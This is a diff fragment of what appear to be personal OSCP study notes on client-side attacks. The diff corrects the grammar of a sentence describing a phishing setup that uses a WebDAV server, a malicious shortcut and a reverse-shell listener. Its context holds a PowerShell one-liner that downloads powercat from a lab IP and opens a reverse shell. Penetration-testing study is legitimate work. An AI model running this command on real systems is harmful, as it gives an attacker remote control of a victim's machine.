krovs/oscp-notes/docs/12_client-side_attacks.md

 powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.152:3333/powercat.ps1'); powercat -c 192.168.45.152 -p 4444 -e powershell"
 ```

-Transfer them to to the attack machine, start a webdav server to serve the shortcut, a python http server to serve the powercat script and a listener to receive the reverse shell and send the email.
+Transfer them to the attack machine, start a WebDAV server to serve the shortcut, a Python HTTP server to serve the powercat script, a listener to receive the reverse shell, and send the email.

 ### Create shortcuts